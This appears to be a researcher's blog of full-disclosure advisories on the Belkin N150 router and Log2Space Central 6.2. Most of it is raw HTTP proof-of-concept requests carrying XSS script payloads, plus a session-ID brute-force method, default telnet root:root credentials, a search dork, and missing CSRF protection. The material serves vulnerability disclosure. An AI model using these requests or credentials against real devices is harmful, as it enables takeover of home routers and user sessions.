Belkin N150 Router Multiple XSS Vulnerabilities

## FULL DISCLOSURE

#Product : Belkin N150 Home Router
#Exploit Author : Rahul Pratap Singh
#Home page Link : http://www.belkin.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Version : F9K1009 v1
#Firmware : 1.00.09
#Date : 24/Feb/2016

→ Vulnerability/BUG Report :

—————————————-
Description:
—————————————-
Belkin N150 Home router is vulnerable to XSS vulnerability. Numerous parameters are not sanitized that leads to XSS.

—————————————-
Vulnerable Code:
—————————————-
belkinsessionxssvulcode

belkinxsspocvulcode

vul8

—————————————-
Exploit and Poc:
—————————————-
1)
GET /cgi-bin/webproc?getpage=html/top.html&var:page=deviceinfo HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/index.html&var:page=deviceinfo
Cookie: sessionid=”></a><img src=x onerror=alert(1)><a; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT; language=en_us
Connection: keep-alive

belkinsessionxsspoc

2)
POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=login
Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 222

getpage=html%2Fpage.html&errorpage=< script>alert(“xss”)< /script>&var%3Apage=deviceinfo&var%3A errorpage=login&var%3Alogin=true&obj-action=auth&%3Ausername=admin&%3Apassword=eHNz&%3Ahostname=dGVjaG5v&%3A action=login&%3Asessionid=3921960f

belkinxsspoc2

3)
POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=login
Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 238

getpage=html/page.html&errorpage=html/page.html&var:page=”< /scRipt>< scRipt>prompt(“xss”)< /scRipt>< scRipt>& var:errorpage=login&var:login=true&obj-action=auth&:username=admin&:password=YWJj&:hostname=dGVjaG5v&:action=login&: sessionid=3921960f

belkinxsspoc3

4)
POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=login
Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 245getpage=html/page.html&errorpage=html/page.html&var:page=deviceinfo&var:errorpage= “< /scRipt>< scRipt>prompt(“xss”)< /scRipt>< scRipt>&var:login=true&obj-action=auth&:username=admin&:password=YWJj&:hostname=dGVjaG5v&:action=login&: sessionid=3921960fbelkinxsspoc45)
GET /cgi-bin/webproc?getpage=< scRipt>prompt(“xss”)< /scRipt>&var:getpage=abc&var:language=en_us&var:page=login&var:oldpage =ut_firmware HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT; language=en_us; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive

belkinxsspoc5

6)
GET /cgi-bin/webproc?getpage=html/page.html&var:menu=”< /scRipt>< scRipt>prompt(“xss”)< /scRipt>< scRipt>&var:page=login&var:subpage=-&var:errorpage=- HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:menu=status&var:page=login&var:subpage=-&var:errorpage=-
Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT; language=en_us; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive

belkinxsspoc6

7)
GET /cgi-bin/webproc?getpage=html/page.html&var:menu=status&var:page=login&var:subpage=”< /scRipt>< scRipt>prompt(“xss”)< /scRipt>< scRipt>& var:errorpage=- HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:menu=status&var:page=login&amp; var:subpage=-&var:errorpage=-
Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT; language=en_us; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive

belkinxsspoc7

8)
GET /cgi-bin/webproc?getpage=html/page.html&var:tbsversion=”< /scRipt>< scRipt>prompt(“xss”)< /scRipt>< scRipt>&var:page=login&var:subpage=-&var:errorpage=- HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:menu=status&var:page=login&var:subpage=-&var:errorpage=-
Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT; language=en_us; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive

belkinxsspoc8

9)
POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=login
Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 262

getpage=html/page.html&errorpage=html/page.html&var:CacheLastData=”< /scRipt>< scRipt>prompt(“xss”)< /scRipt>< scRipt>& var:page=abc&var:errorpage=login&var:login=true&obj-action=auth&:username=admin&:password=YWJj&:hostname=dGVjaG5v&:action=login&: sessionid=3921960f

belkinxsspoc9

10)
POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=login
Cookie: sessionid=392Multiple XSS Vulnerabilities1960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 262

getpage=html/page.html&errorpage=html/page.html&var:sys_UserLevel=”< /scRipt>< scRipt>prompt(“xss”)< /scRipt>< scRipt>& var:page=abc&var:errorpage=login&var:login=true&obj-action=auth&:username=admin&:password=YWJj&:hostname=dGVjaG5v&:action=login&: sessionid=3921960f

belkinxsspoc10

11)
GET /cgi-bin/webproc?getpage=html/page.html&var:style=”< /scRipt>< scRipt>prompt(“xss”)< /scRipt>< scRipt>&var:page=login&var:subpage=-&var:errorpage=- HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:menu=status&var:page=login&var:subpage=-&var:errorpage=-
Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT; language=en_us; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive

belkinxsspoc11

Vulnerability Disclosure Timeline:
→ January 30, 2016     – Bug discovered, initial report to Belkin Security Team
→ February 24, 2016  – No response from vendor
→ February 24, 2016  – Full Disclosure

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
Advertisements

Log2Space Central v 6.2 Multiple XSS Vulnerability

## FULL DISCLOSURE

#Product    : Log2Space Central
#Exploit Author  : Rahul Pratap Singh
#Version    : 6.2
#Dork        : “Powered by Spacecom Technologies Ltd”

#Date         : 27/Jan/2016

XSS Vulnerability:

—————————————-
Description:
—————————————-
“invID, login, UserName, DayFrom, MonthFrom, YearFrom, DayTo, MonthTo, YearTo, usage” parameters are not sanitized that leads to Reflected XSS.

—————————————-
Exploit:
—————————————-
Send following Post request: (unauthenticated)

POST /cgi/login.php

txtLogin=xss&txtLoginPass=xss&Submit=Login&invID=”/><img src=x onerror=alert(1)>”&recID=

Send following Get request: (authenticated)

GET /cgi/activation.php?pageRef=user&login=”/><img%20src=x%20onerror=alert(1)>%20″

—————————————-
POC:
—————————————-
ualog2spacecentralxss

Fix:
This version is already patched according to Vendor.

Vulnerability Disclosure Timeline:
→ January 18, 2015  – Bug discovered, initial report to Vendor
→ January 19, 2015  – Vendor acknowledged, version already patched (reported server                                             not updated)
→ January 19, 2015  – Vendor asked for the affected server IP.
→ January 20, 2015  – Affected server IP, reported.
→ January 25, 2015  – Affected Server Patched.

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

Belkin N150 Router Multiple Vulnerabilities

Full Disclosure:
Recently, I encountered some vulnerabilities in Belkin N150 Router. Reported it to the vendor and haven’t  got any reply from Belkin Security Team.

→ Vulnerability/BUG Report :

1)
• Vulnerability Title : HTML/Script Injection
• Browser : Firefox 41
• OS : Ubuntu 14.04
• Vulnerable : Belkin N150 Wireless Home Network Router
• Version : F9K1009 v1
• Firmware : 1.00.09

→ Proof of Concept:

“InternetGatewayDevice.DeviceInfo.X_TWSZ-COM_Language” this parameter is vulnerable.

1_vul_code→ Steps to Reproduce:

Send the following post request using Burpsuite,etc

POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=deviceinfo&var:oldpage=-
Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 260

%3AInternetGatewayDevice.DeviceInfo.X_TWSZ-COM_Language=”>alert(“1”)<script>”&obj-action=set&var%3Apage=deviceinfo&var%3Aerrorpage=deviceinfo&
getpage=html%2Findex.html&errorpage=html%2Findex.html&
var%3ACacheLastData=U1BBTl9UaW1lTnVtMT0%3D

2)
• Vulnerability Title : Session Hijacking
• Browser : Firefox 41
• OS : Ubuntu 14.04
• Vulnerable : Belkin N150 Wireless Home Network Router
• Version : F9K1009 v1
• Firmware : 1.00.09

→ Proof of Concept:

Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT

sessionid is allocated using hex encoding and of fixed length i.e 8 . Therefore, it is very easy to bruteforce it in feasible amount for time as this session id ranges from 00000000 to ffffffff

→ Steps to Reproduce:

Send the following request using Burpsuite and Bruteforce the sessionid.

POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=deviceinfo&var:oldpage=-
Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT

3)
• Vulnerability Title : Telnet Enabled with Default Pass
• Browser : Firefox 41
• OS : Ubuntu 14.04
• Vulnerable : Belkin N150 Wireless Home Network Router
• Version : F9K1009 v1
• Firmware : 1.00.09

→ Vulnerability Details:

Telnet protocol can be used by an attacker to gain remote access to the router with root privileges.

→ Proof of Concept:

3_telnet

→ Steps to Reproduce:

1) Open terminal
2) Type following command:
telnet 192.168.2.1
3) Default user and pass is root:root

4)
• Vulnerability Title : Cross Site Request Forgery
• Browser : Firefox 41
• OS : Ubuntu 14.04
• Vulnerable : Belkin N150 Wireless Home Network Router
• Version : F9K1009 v1
• Firmware : 1.00.09

→ Proof of Concept:

Request doesn’t contain any CSRF-token. Therefore, requests can be forged. It can be verified with any request.

Public ref:
http://www.securityfocus.com/archive/1/537000/30/0/threaded
https://packetstormsecurity.com/files/134564/Belkin-N150-XSS-CSRF-Session-Hijacking.html